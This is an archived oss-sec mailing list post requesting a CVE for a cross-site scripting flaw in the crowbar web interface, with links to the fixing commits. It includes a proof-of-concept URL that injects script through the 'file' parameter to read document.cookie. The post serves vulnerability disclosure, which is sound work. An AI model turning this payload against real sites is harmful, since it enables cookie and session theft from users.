oss-sec mailing list archives
CVE request: crowbar XSS
From: Thomas Biege <thomas () suse de>
Date: Thu, 30 Aug 2012 14:15:19 +0200
Hi, Matthias Weckbecker of SUSE Linux Products GmbH has found the following issue in crowbar: http://crowbar.test.de:3000/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)</script><!-- https://github.com/SUSE-Cloud/barclamp-crowbar/commit/90e905b7668a1cc884fb70040f96c7a0a287de48 https://github.com/SUSE-Cloud/barclamp-crowbar/commit/a82ed926c6e3ba2b0cada213c35e4b00f34ea629 Cheers, Thomas -- Thomas Biege, Project Manager Security, CSSLP SUSE LINUX GmbH, GF: Jeff Hawn, Jennifer Guild, Felix Imendörffer, HRB 21284 (AG Nürnberg) -- Wer aufhoert besser werden zu wollen, hoert auf gut zu sein. -- Marie von Ebner-Eschenbach
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- CVE request: crowbar XSS Thomas Biege (Aug 30)
- Re: CVE request: crowbar XSS Kurt Seifried (Aug 30)